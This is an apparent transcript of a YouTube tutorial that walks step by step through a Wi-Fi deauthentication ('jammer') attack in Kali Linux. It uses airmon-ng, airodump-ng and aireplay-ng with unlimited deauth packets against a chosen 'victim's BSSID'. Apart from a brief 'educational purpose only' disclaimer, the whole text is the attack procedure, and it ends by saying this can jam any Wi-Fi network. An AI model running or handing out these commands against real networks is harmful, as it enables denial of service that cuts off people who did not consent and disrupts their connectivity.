Hey there, it's Shaka and you are watching All About Tech. In this video, I will be showing you that how to make Wi-Fi jammer in Kali Linux. Before starting this video, I want to tell that I made this video for educational purpose only, so do not use this method in any illegal activity. Let's get started. First open terminal and type iwconfig to view the Wi-Fi configuration. Then we need to start monitor mode to view all available networks. So type airmon-ng blank start blank our Wi-Fi name WLAN 0 and press enter. Then type airrodump -ng blank WLAN 0 mon and press enter. It will scan for Wi-Fi networks. As you can see, this is my local Wi-Fi network. Now open another terminal window and place it side. Then press Ctrl+C to stop the scan. Then type airrodump-ng blank -c. Here the -c is channel number blank your channel number blank -BSSID. Now just copy and paste your victim's BSSID that you want to jam blank WLAN 0 mon and press enter. It will monitor only your selected network. As you can see, my phone is only connected to this network. Press Ctrl+C to stop the scan. Then type AIREPLOY replay -ng blank -0 blank 0 blank -a blank. Paste your victim's BSSID. Blank WLAN 0 mon. As you can see, my phone is connected to my Wi-Fi network, and when I press enter, the Wi-Fi will get disconnected because the system is sending deauthorization packs to the Wi-Fi. Press Ctrl+C to stop the attack. When the attack stops, the Wi-Fi connects again. In this way, you can simply jam any Wi-Fi network. Then to stop the monitor mode, type airmon-ng blank stop blank WLAN 0 mon and press enter. It will stop the monitor mode. Now your Wi-Fi will work normally. So that's it for today's video. If you found it useful, then press the like button. If you have any queries, please comment down below, and don't forget to subscribe this YouTube channel for getting more tech videos. Thank you.